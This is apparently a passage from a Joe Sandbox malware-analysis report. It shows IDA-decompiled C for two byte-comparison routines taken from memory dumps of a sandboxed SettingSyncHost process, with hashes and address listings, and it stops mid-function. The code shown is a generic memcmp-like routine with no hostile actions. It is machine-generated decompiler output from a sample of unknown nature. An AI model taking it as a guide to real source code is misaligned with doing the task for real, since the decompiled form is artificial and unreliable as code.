                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                      • Instruction ID: f8382b914fd7e335699decde436014212a01739b34e53797ea12addd0bfc0150
                                                                                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                      • Instruction Fuzzy Hash: 60C17C73D1E5B2098F37462E545923BEEA26E91B8131FC3A5DCD03F68DC222AD11A6D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D4A5(void* __eax, void* __ecx) {
                                                                                                                                      				void* _t191;
                                                                                                                                      				signed int _t192;
                                                                                                                                      				void* _t195;
                                                                                                                                      				signed char _t200;
                                                                                                                                      				signed char _t201;
                                                                                                                                      				signed char _t202;
                                                                                                                                      				signed char _t203;
                                                                                                                                      				signed char _t205;
                                                                                                                                      				signed int _t210;
                                                                                                                                      				signed int _t284;
                                                                                                                                      				void* _t287;
                                                                                                                                      				void* _t289;
                                                                                                                                      				void* _t291;
                                                                                                                                      				void* _t293;
                                                                                                                                      				void* _t296;
                                                                                                                                      				void* _t298;
                                                                                                                                      				void* _t300;
                                                                                                                                      				void* _t303;
                                                                                                                                      				void* _t305;
                                                                                                                                      				void* _t307;
                                                                                                                                      				void* _t310;
                                                                                                                                      				void* _t312;
                                                                                                                                      				void* _t314;
                                                                                                                                      				void* _t317;
                                                                                                                                      				void* _t319;
                                                                                                                                      				void* _t321;
                                                                                                                                      				void* _t324;
                                                                                                                                      				void* _t326;
                                                                                                                                      				void* _t328;
                                                                                                                                      
                                                                                                                                      				_t195 = __ecx;
                                                                                                                                      				_t191 = __eax;
                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                                                                      					_t284 = 0;
                                                                                                                                      					L15:
                                                                                                                                      					if(_t284 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					_t200 =  *(_t191 - 0x1a);
                                                                                                                                      					if(_t200 ==  *(_t195 - 0x1a)) {
                                                                                                                                      						_t284 = 0;
                                                                                                                                      						L26:
                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						_t201 =  *(_t191 - 0x16);
                                                                                                                                      						if(_t201 ==  *(_t195 - 0x16)) {
                                                                                                                                      							_t284 = 0;
                                                                                                                                      							L37:
                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							_t202 =  *(_t191 - 0x12);
                                                                                                                                      							if(_t202 ==  *(_t195 - 0x12)) {
                                                                                                                                      								_t284 = 0;
                                                                                                                                      								L48:
                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								_t203 =  *(_t191 - 0xe);
                                                                                                                                      								if(_t203 ==  *(_t195 - 0xe)) {
                                                                                                                                      									_t284 = 0;
                                                                                                                                      									L59:
                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                                                                      										_t284 = 0;
                                                                                                                                      										L70:
                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										_t205 =  *(_t191 - 6);
                                                                                                                                      										if(_t205 ==  *(_t195 - 6)) {
                                                                                                                                      											_t284 = 0;
                                                                                                                                      											L81:
                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                                                                      												_t192 = 0;
                                                                                                                                      												L3:
                                                                                                                                      												return _t192;
                                                                                                                                      											}
                                                                                                                                      											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                                                                      											if(_t287 == 0) {
                                                                                                                                      												L4:
                                                                                                                                      												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                                                                      												if(_t192 != 0) {
                                                                                                                                      													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
                                                                                                                                      													_t192 = (_t192 > 0) + _t8;
                                                                                                                                      												}
                                                                                                                                      												goto L3;
                                                                                                                                      											}
                                                                                                                                      											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                                                                                                                                      											if(_t210 != 0) {
                                                                                                                                      												_t192 = _t210;
                                                                                                                                      												goto L3;
                                                                                                                                      											}
                                                                                                                                      											goto L4;
                                                                                                                                      										}
                                                                                                                                      										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                                                                      										if(_t289 == 0) {
                                                                                                                                      											L74:
                                                                                                                                      											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                                                                      											if(_t291 == 0) {
                                                                                                                                      												L76:
                                                                                                                                      												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                                                                      												if(_t293 == 0) {
                                                                                                                                      													L78:
                                                                                                                                      													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                                                                      													if(_t284 != 0) {
                                                                                                                                      														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      														_t284 = (_t284 > 0) + _t182;
                                                                                                                                      													}
                                                                                                                                      													goto L81;
                                                                                                                                      												}
                                                                                                                                      												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
                                                                                                                                      												_t284 = (_t293 > 0) + _t176;
                                                                                                                                      												if(_t284 != 0) {
                                                                                                                                      													goto L1;
                                                                                                                                      												}
                                                                                                                                      												goto L78;
                                                                                                                                      											}
                                                                                                                                      											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      											_t284 = (_t291 > 0) + _t170;
                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L76;
                                                                                                                                      										}
                                                                                                                                      										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
                                                                                                                                      										_t284 = (_t289 > 0) + _t164;
                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L74;
                                                                                                                                      									}
                                                                                                                                      									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                                                                      									if(_t296 == 0) {
                                                                                                                                      										L63:
                                                                                                                                      										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                                                                      										if(_t298 == 0) {
                                                                                                                                      											L65:
                                                                                                                                      											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                                                                      											if(_t300 == 0) {
                                                                                                                                      												L67:
                                                                                                                                      												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                                                                      												if(_t284 != 0) {
                                                                                                                                      													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      													_t284 = (_t284 > 0) + _t157;
                                                                                                                                      												}
                                                                                                                                      												goto L70;
                                                                                                                                      											}
                                                                                                                                      											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
                                                                                                                                      											_t284 = (_t300 > 0) + _t151;
                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L67;
                                                                                                                                      										}
                                                                                                                                      										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
                                                                                                                                      										_t284 = (_t298 > 0) + _t145;
                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L65;
                                                                                                                                      									}
                                                                                                                                      									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
                                                                                                                                      									_t284 = (_t296 > 0) + _t139;
                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L63;
                                                                                                                                      								}
                                                                                                                                      								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                                                                      								if(_t303 == 0) {
                                                                                                                                      									L52:
                                                                                                                                      									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                                                                      									if(_t305 == 0) {
                                                                                                                                      										L54:
                                                                                                                                      										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                                                                      										if(_t307 == 0) {
                                                                                                                                      											L56:
                                                                                                                                      											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                                                                      											if(_t284 != 0) {
                                                                                                                                      												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      												_t284 = (_t284 > 0) + _t131;
                                                                                                                                      											}
                                                                                                                                      											goto L59;
                                                                                                                                      										}
                                                                                                                                      										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
                                                                                                                                      										_t284 = (_t307 > 0) + _t125;
                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L56;
                                                                                                                                      									}
                                                                                                                                      									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
                                                                                                                                      									_t284 = (_t305 > 0) + _t119;
                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L54;
                                                                                                                                      								}
                                                                                                                                      								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
                                                                                                                                      								_t284 = (_t303 > 0) + _t113;
                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L52;
                                                                                                                                      							}
                                                                                                                                      							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                                                                      							if(_t310 == 0) {
                                                                                                                                      								L41:
                                                                                                                                      								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                                                                      								if(_t312 == 0) {
                                                                                                                                      									L43:
                                                                                                                                      									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                                                                      									if(_t314 == 0) {
                                                                                                                                      										L45:
                                                                                                                                      										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                                                                      										if(_t284 != 0) {
                                                                                                                                      											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      											_t284 = (_t284 > 0) + _t106;
                                                                                                                                      										}
                                                                                                                                      										goto L48;
                                                                                                                                      									}
                                                                                                                                      									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
                                                                                                                                      									_t284 = (_t314 > 0) + _t100;
                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L45;
                                                                                                                                      								}
                                                                                                                                      								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
                                                                                                                                      								_t284 = (_t312 > 0) + _t94;
                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L43;
                                                                                                                                      							}
                                                                                                                                      							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
                                                                                                                                      							_t284 = (_t310 > 0) + _t88;
                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L41;
                                                                                                                                      						}
                                                                                                                                      						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                                                                      						if(_t317 == 0) {
                                                                                                                                      							L30:
                                                                                                                                      							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                                                                      							if(_t319 == 0) {
                                                                                                                                      								L32:
                                                                                                                                      								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                                                                      								if(_t321 == 0) {
                                                                                                                                      									L34:
                                                                                                                                      									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                                                                      									if(_t284 != 0) {
                                                                                                                                      										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      										_t284 = (_t284 > 0) + _t81;
                                                                                                                                      									}
                                                                                                                                      									goto L37;
                                                                                                                                      								}
                                                                                                                                      								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
                                                                                                                                      								_t284 = (_t321 > 0) + _t75;
                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L34;
                                                                                                                                      							}
                                                                                                                                      							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
                                                                                                                                      							_t284 = (_t319 > 0) + _t69;
                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L32;
                                                                                                                                      						}
                                                                                                                                      						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
                                                                                                                                      						_t284 = (_t317 > 0) + _t63;
                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L30;
                                                                                                                                      					}
                                                                                                                                      					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                                                                      					if(_t324 == 0) {
                                                                                                                                      						L19:
                                                                                                                                      						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                                                                      						if(_t326 == 0) {
                                                                                                                                      							L21:
                                                                                                                                      							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                                                                      							if(_t328 == 0) {
                                                                                                                                      								L23:
                                                                                                                                      								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                                                                      								if(_t284 != 0) {
                                                                                                                                      									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
                                                                                                                                      									_t284 = (_t284 > 0) + _t56;
                                                                                                                                      								}
                                                                                                                                      								goto L26;
                                                                                                                                      							}
                                                                                                                                      							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
                                                                                                                                      							_t284 = (_t328 > 0) + _t50;
                                                                                                                                      							if(_t284 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L23;
                                                                                                                                      						}
                                                                                                                                      						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
                                                                                                                                      						_t284 = (_t326 > 0) + _t44;
                                                                                                                                      						if(_t284 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L21;
                                                                                                                                      					}
                                                                                                                                      					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
                                                                                                                                      					_t284 = (_t324 > 0) + _t38;
                                                                                                                                      					if(_t284 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L19;
                                                                                                                                      				} else {
                                                                                                                                      					__esi = __dl & 0x000000ff;
                                                                                                                                      					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                                      					if(__esi == 0) {
                                                                                                                                      						L8:
                                                                                                                                      						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                                      						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                      						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                      						if(__esi == 0) {
                                                                                                                                      							L10:
                                                                                                                                      							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L12:
                                                                                                                                      								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}
































                                                                                                                                      0x0039d679
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d679
                                                                                                                                      0x0039d654
                                                                                                                                      0x0039d654
                                                                                                                                      0x0039d65a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d65a
                                                                                                                                      0x0039d5c2
                                                                                                                                      0x0039d5c4
                                                                                                                                      0x0039d5d9
                                                                                                                                      0x0039d5e1
                                                                                                                                      0x0039d5e3
                                                                                                                                      0x0039d5f8
                                                                                                                                      0x0039d600
                                                                                                                                      0x0039d602
                                                                                                                                      0x0039d617
                                                                                                                                      0x0039d61f
                                                                                                                                      0x0039d621
                                                                                                                                      0x0039d62a
                                                                                                                                      0x0039d62a
                                                                                                                                      0x0039d62a
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d621
                                                                                                                                      0x0039d60b
                                                                                                                                      0x0039d60b
                                                                                                                                      0x0039d611
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d611
                                                                                                                                      0x0039d5ec
                                                                                                                                      0x0039d5ec
                                                                                                                                      0x0039d5f2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5f2
                                                                                                                                      0x0039d5cd
                                                                                                                                      0x0039d5cd
                                                                                                                                      0x0039d5d3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5d3
                                                                                                                                      0x0039d53b
                                                                                                                                      0x0039d53d
                                                                                                                                      0x0039d552
                                                                                                                                      0x0039d55a
                                                                                                                                      0x0039d55c
                                                                                                                                      0x0039d571
                                                                                                                                      0x0039d579
                                                                                                                                      0x0039d57b
                                                                                                                                      0x0039d590
                                                                                                                                      0x0039d598
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d58a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d58a
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d56b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d56b
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d54c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4ad
                                                                                                                                      0x0039d4ad
                                                                                                                                      0x0039d4b0
                                                                                                                                      0x0039d4b4
                                                                                                                                      0x0039d4b6
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cf
                                                                                                                                      0x0039d4d3
                                                                                                                                      0x0039d4d5
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ee
                                                                                                                                      0x0039d4f2
                                                                                                                                      0x0039d4f4
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d50d
                                                                                                                                      0x0039d511
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d515
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d4f6
                                                                                                                                      0x0039d4fa
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d503
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d503
                                                                                                                                      0x0039d4d7
                                                                                                                                      0x0039d4db
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x0039d4b8
                                                                                                                                      0x0039d4bc
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4c5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4c5
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                      • Instruction ID: e14b960c3f1e1843109ecdde8bc801b2f97e43d88186aba76b81b915e8bfcc40
                                                                                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                      • Instruction Fuzzy Hash: 25C18C73D1E5B2098F37462D145923FEEA26E92B8132FC3A5DCD03F68DC622AD0596D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D0D3(void* __eax, void* __ecx) {
                                                                                                                                      				void* _t183;
                                                                                                                                      				signed int _t184;
                                                                                                                                      				void* _t187;
                                                                                                                                      				signed char _t192;
                                                                                                                                      				signed char _t193;
                                                                                                                                      				signed char _t194;
                                                                                                                                      				signed char _t195;
                                                                                                                                      				signed char _t197;
                                                                                                                                      				signed int _t271;
                                                                                                                                      				void* _t274;
                                                                                                                                      				void* _t276;
                                                                                                                                      				void* _t278;
                                                                                                                                      				void* _t281;
                                                                                                                                      				void* _t283;
                                                                                                                                      				void* _t285;
                                                                                                                                      				void* _t288;
                                                                                                                                      				void* _t290;
                                                                                                                                      				void* _t292;
                                                                                                                                      				void* _t295;
                                                                                                                                      				void* _t297;
                                                                                                                                      				void* _t299;
                                                                                                                                      				void* _t302;
                                                                                                                                      				void* _t304;
                                                                                                                                      				void* _t306;
                                                                                                                                      				void* _t309;
                                                                                                                                      				void* _t311;
                                                                                                                                      				void* _t313;
                                                                                                                                      
                                                                                                                                      				_t187 = __ecx;
                                                                                                                                      				_t183 = __eax;
                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                                                                      					_t271 = 0;
                                                                                                                                      					L12:
                                                                                                                                      					if(_t271 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					_t192 =  *(_t183 - 0x19);
                                                                                                                                      					if(_t192 ==  *(_t187 - 0x19)) {
                                                                                                                                      						_t271 = 0;
                                                                                                                                      						L23:
                                                                                                                                      						if(_t271 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						_t193 =  *(_t183 - 0x15);
                                                                                                                                      						if(_t193 ==  *(_t187 - 0x15)) {
                                                                                                                                      							_t271 = 0;
                                                                                                                                      							L34:
                                                                                                                                      							if(_t271 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							_t194 =  *(_t183 - 0x11);
                                                                                                                                      							if(_t194 ==  *(_t187 - 0x11)) {
                                                                                                                                      								_t271 = 0;
                                                                                                                                      								L45:
                                                                                                                                      								if(_t271 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								_t195 =  *(_t183 - 0xd);
                                                                                                                                      								if(_t195 ==  *(_t187 - 0xd)) {
                                                                                                                                      									_t271 = 0;
                                                                                                                                      									L56:
                                                                                                                                      									if(_t271 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                                                                      										_t271 = 0;
                                                                                                                                      										L67:
                                                                                                                                      										if(_t271 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										_t197 =  *(_t183 - 5);
                                                                                                                                      										if(_t197 ==  *(_t187 - 5)) {
                                                                                                                                      											_t271 = 0;
                                                                                                                                      											L78:
                                                                                                                                      											if(_t271 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                                                                      											if(_t184 != 0) {
                                                                                                                                      												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
                                                                                                                                      												_t184 = (_t184 > 0) + _t182;
                                                                                                                                      											}
                                                                                                                                      											L2:
                                                                                                                                      											return _t184;
                                                                                                                                      										}
                                                                                                                                      										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                                                                      										if(_t274 == 0) {
                                                                                                                                      											L71:
                                                                                                                                      											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                                                                      											if(_t276 == 0) {
                                                                                                                                      												L73:
                                                                                                                                      												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                                                                      												if(_t278 == 0) {
                                                                                                                                      													L75:
                                                                                                                                      													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                                                                      													if(_t271 != 0) {
                                                                                                                                      														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      														_t271 = (_t271 > 0) + _t176;
                                                                                                                                      													}
                                                                                                                                      													goto L78;
                                                                                                                                      												}
                                                                                                                                      												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
                                                                                                                                      												_t271 = (_t278 > 0) + _t170;
                                                                                                                                      												if(_t271 != 0) {
                                                                                                                                      													goto L1;
                                                                                                                                      												}
                                                                                                                                      												goto L75;
                                                                                                                                      											}
                                                                                                                                      											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
                                                                                                                                      											_t271 = (_t276 > 0) + _t164;
